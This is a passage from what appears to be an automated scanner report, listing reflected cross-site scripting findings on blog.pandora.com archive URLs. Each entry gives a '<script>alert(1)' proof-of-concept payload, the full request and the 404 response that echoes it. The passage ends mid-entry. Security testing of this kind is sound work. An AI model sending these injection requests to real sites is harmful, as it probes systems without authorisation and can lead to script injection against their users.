Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/09 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload caeac<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009caeac<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009caeac<script>alert(1)< ...[SNIP]... |
3.220. http://blog.pandora.com/pandora/archives/2009/09/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/09 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f8a9<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/097f8a9<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/097f8a9<script>alert(1)< ...[SNIP]... |
3.221. http://blog.pandora.com/pandora/archives/2009/10/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/10 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a732<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8a732<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8a732<script>alert(1)< ...[SNIP]... |
3.222. http://blog.pandora.com/pandora/archives/2009/10/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/10 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cb43c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivescb43c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivescb43c<script>alert(1)< ...[SNIP]... |
3.223. http://blog.pandora.com/pandora/archives/2009/10/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/10 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ad1ff<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009ad1ff<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009ad1ff<script>alert(1)< ...[SNIP]... |
3.224. http://blog.pandora.com/pandora/archives/2009/10/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/10 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 241d1<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/10241d1<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:05 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/10241d1<script>alert(1)< ...[SNIP]... |
3.225. http://blog.pandora.com/pandora/archives/2009/11/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/11 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47148<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora47148<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora47148<script>alert(1)< ...[SNIP]... |
3.226. http://blog.pandora.com/pandora/archives/2009/11/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/11 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f6439<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf6439<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf6439<script>alert(1)< ...[SNIP]... |
3.227. http://blog.pandora.com/pandora/archives/2009/11/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/11 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a0786<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009a0786<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009a0786<script>alert(1)< ...[SNIP]... |
3.228. http://blog.pandora.com/pandora/archives/2009/11/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/11 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e31a9<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/11e31a9<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/11e31a9<script>alert(1)< ...[SNIP]... |
3.229. http://blog.pandora.com/pandora/archives/2009/12/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/12 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55536<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora55536<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora55536<script>alert(1)< ...[SNIP]... |
3.230. http://blog.pandora.com/pandora/archives/2009/12/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/12 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c021<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5c021<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5c021<script>alert(1)< ...[SNIP]... |
3.231. http://blog.pandora.com/pandora/archives/2009/12/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/12 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7c9b0<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20097c9b0<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20097c9b0<script>alert(1)< ...[SNIP]... |
3.232. http://blog.pandora.com/pandora/archives/2009/12/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2009/12 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9e75b<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/129e75b<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/129e75b<script>alert(1)< ...[SNIP]... |
3.233. http://blog.pandora.com/pandora/archives/2010/01/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/01 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc983<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoracc983<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoracc983<script>alert(1)< ...[SNIP]... |
3.234. http://blog.pandora.com/pandora/archives/2010/01/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/01 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8de66<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8de66<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives8de66<script>alert(1)< ...[SNIP]... |
3.235. http://blog.pandora.com/pandora/archives/2010/01/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/01 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2e9cf<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20102e9cf<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:45 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20102e9cf<script>alert(1)< ...[SNIP]... |
3.236. http://blog.pandora.com/pandora/archives/2010/01/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/01 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61fb7<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0161fb7<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0161fb7<script>alert(1)< ...[SNIP]... |
3.237. http://blog.pandora.com/pandora/archives/2010/02/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/02 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b45c8<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab45c8<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorab45c8<script>alert(1)< ...[SNIP]... |
3.238. http://blog.pandora.com/pandora/archives/2010/02/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/02 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c321c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc321c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc321c<script>alert(1)< ...[SNIP]... |
3.239. http://blog.pandora.com/pandora/archives/2010/02/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/02 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fa813<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010fa813<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010fa813<script>alert(1)< ...[SNIP]... |
3.240. http://blog.pandora.com/pandora/archives/2010/02/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/02 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 57830<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0257830<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0257830<script>alert(1)< ...[SNIP]... |
3.241. http://blog.pandora.com/pandora/archives/2010/03/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/03 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23646<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora23646<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora23646<script>alert(1)< ...[SNIP]... |
3.242. http://blog.pandora.com/pandora/archives/2010/03/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/03 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b658<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives1b658<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives1b658<script>alert(1)< ...[SNIP]... |
3.243. http://blog.pandora.com/pandora/archives/2010/03/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/03 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 490a0<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010490a0<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010490a0<script>alert(1)< ...[SNIP]... |
3.244. http://blog.pandora.com/pandora/archives/2010/03/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/03 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8018f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/038018f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/038018f<script>alert(1)< ...[SNIP]... |
3.245. http://blog.pandora.com/pandora/archives/2010/04/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/04 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bb4ba<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabb4ba<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:31 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorabb4ba<script>alert(1)< ...[SNIP]... |
3.246. http://blog.pandora.com/pandora/archives/2010/04/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/04 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d94d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5d94d<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5d94d<script>alert(1)< ...[SNIP]... |
3.247. http://blog.pandora.com/pandora/archives/2010/04/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/04 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c7e3f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010c7e3f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010c7e3f<script>alert(1)< ...[SNIP]... |
3.248. http://blog.pandora.com/pandora/archives/2010/04/ [REST URL parameter 4] previous next
Summary
Severity: | High |
